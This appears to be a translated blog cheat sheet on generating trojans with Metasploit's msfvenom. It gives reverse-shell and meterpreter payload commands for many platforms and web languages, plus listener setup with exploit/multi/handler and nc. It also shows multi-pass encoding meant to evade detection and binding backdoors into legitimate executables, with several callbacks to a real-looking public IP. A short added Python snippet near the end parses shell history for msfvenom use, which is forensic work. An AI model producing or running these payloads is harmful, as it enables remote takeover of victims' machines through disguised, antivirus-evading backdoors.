• Generating trojans with msf


    Linux

      msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

    Windows

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

    Mac

      msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

    Web Payloads

    PHP

      msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
      cat shell.php | pbcopy && echo '<?php ' | tr -d ' ' > shell.php && pbpaste >> shell.php

    ASP

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

    JSP

      msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

    WAR

      msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

    Scripting Payloads

    Python

      msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

    Bash

      msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

    Perl

      msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

     

    Receiving the reverse connection:

    use exploit/multi/handler

    set payload linux/x64/meterpreter/reverse_tcp

    set LHOST 192.168.76.132

    set LPORT 1111

    exploit

     

    Concrete usage:

    Generate the trojan:

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=81.71.25.1 lport=7001 --platform win -f exe -o /home/kali/Desktop/54320.exe

    Listen:

    nc -l -p 7001

    Or:

    msfconsole

    use exploit/multi/handler

    //set payload windows/x64/meterpreter/reverse_tcp

    set LHOST 192.168.33.143

    set LPORT 7001

    exploit

     

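    msf is the Metasploit Framework. It can be used for exploitation, vulnerability detection and similar tasks, and is a very good tool.

    It is a framework, so it can be modified.
    msfvenom -p windows/shell_reverse_tcp lhost=192.168.33.135 lport=7001 -a x86 --platform win -f exe -o a.exe

    -p specifies the payload path
    lhost=1.1.1.1 lport=4444 //
    -a x86 // architecture of the operating system
    --platform win // platform; win is the Windows platform
    -f exe // output format, here exe
    -o // output file name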

    Generating an encoded shell

    msfvenom -p windows/shell/bind_tcp lhost=192.168.33.135 lport=7001 -f raw -e x86/shikata_ga_nai -i 6 | msfvenom -a x86 --platform windows -e x86/countdown -i 7 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -b '\x00' -f exe -o b.exe

    -f raw outputs in raw format
    -e takes an encoder module; -i takes the number of encoding passes; | ... encodes again
    -b '\x00' removes the special character \x00

    generate -b '\x00\xff' -f exe -o /home/1.exe


    Binding the backdoor to another template: -x
    msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=192.168.33.135 lport=7001 -a x86 --platform win -f exe -o c.exe

    Run the following commands directly on Linux to generate the trojan

    Plain reverse TCP (shell_reverse_tcp):

    msfvenom -p windows/shell_reverse_tcp lhost=81.71.25.1 lport=54322 --platform win -f exe -o /home/kali/Desktop/5432.exe

    Usage: you can connect directly with nc, or use msf without setting a payload

     

    Using reverse meterpreter_tcp/http:

    msfvenom -p windows/meterpreter/reverse_tcp lhost=81.71.25.1 lport=54322 --platform win -f exe -o /home/kali/Desktop/54320.exe

     

    With encoding:

    msfvenom -p windows/meterpreter/reverse_http lhost=81.71.25.1 lport=54322 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -b '\x00' -f exe -o /home/kali/Desktop/meter_http_msfjiami_54322

     

    Encoded and bound to a file (sometimes the file does not work properly):

    msfvenom -p windows/meterpreter/reverse_http lhost=81.71.25.1 lport=54322 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -b '\x00' -k -x /home/kali/Desktop/key.exe -f exe -o /home/kali/Desktop/54322_key_http_msfjiami.exe

     

    Bound to a file without encoding:

    msfvenom -p windows/meterpreter/reverse_http -k -x /home/kali/Desktop/bing.exe lhost=81.71.25.1 lport=54322 --platform win -f exe -o /home/kali/Desktop/54322_bing.exe

     

    Generating source code:

    msfvenom -p windows/meterpreter/reverse_http lhost=81.71.25.1 lport=54322 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 15 -f csharp -o /home/kali/Desktop/yuanma.txt
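
From the defender's side, the options used throughout this page (`-p`, `lhost`/`lport`, `-a`, `--platform`, `-f`, `-o`, `-e`, `-x`) are exactly what an incident responder reads back out of a recovered shell history. The following is an added example, not code from the original post; the function names `parse_stage` and `triage` and the sample history are constructed for illustration.

```python
import shlex

# Options that take one value, as used in the commands on this page.
# ">" covers the "-f elf > shell.elf" redirect form.
VALUE_FLAGS = {"-p": "payload", "-a": "arch", "--platform": "platform",
               "-f": "format", "-o": "output", ">": "output", "-x": "template"}

def parse_stage(segment):
    """Parse one pipeline segment; return None unless it is an msfvenom call."""
    try:
        tokens = shlex.split(segment)
    except ValueError:              # unbalanced quote in a damaged history line
        tokens = segment.split()
    if not tokens or tokens[0] != "msfvenom":
        return None
    rec, i = {"encoders": []}, 1
    while i < len(tokens):
        tok = tokens[i]
        val = tokens[i + 1] if i + 1 < len(tokens) else None
        if tok in VALUE_FLAGS and val is not None:
            rec[VALUE_FLAGS[tok]] = val
            i += 2
        elif tok == "-e" and val is not None:
            rec["encoders"].append(val)
            i += 2
        else:
            key, _, value = tok.partition("=")
            if key.lower() in ("lhost", "lport") and value:
                rec[key.lower()] = value
            i += 1
    return rec

def triage(history_text):
    """Return one merged record per history line that invokes msfvenom."""
    findings = []
    for line in history_text.splitlines():
        stages = [s for s in map(parse_stage, line.split("|")) if s]
        if not stages:
            continue
        merged = {"encoders": []}
        for stage in stages:
            merged["encoders"] += stage.pop("encoders")
            merged.update(stage)    # later stages win, e.g. the final -f/-o
        findings.append(merged)
    return findings

# Constructed sample history (192.0.2.0/24 is a documentation range).
SAMPLE = """ls -la
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.0.2.10 LPORT=4444 -f elf > shell.elf
msfvenom -p windows/meterpreter/reverse_http lhost=192.0.2.10 lport=8443 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f exe -o /tmp/out.exe
"""
```

Calling `triage(SAMPLE)` yields one record per msfvenom line, with the callback address, port, output path and encoder chain ready to be searched for in network and file-system evidence.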

     

     

     

    Reference: https://www.cnblogs.com/kyx599/p/12935572.html

  • Original article: https://www.cnblogs.com/trevain/p/13675241.html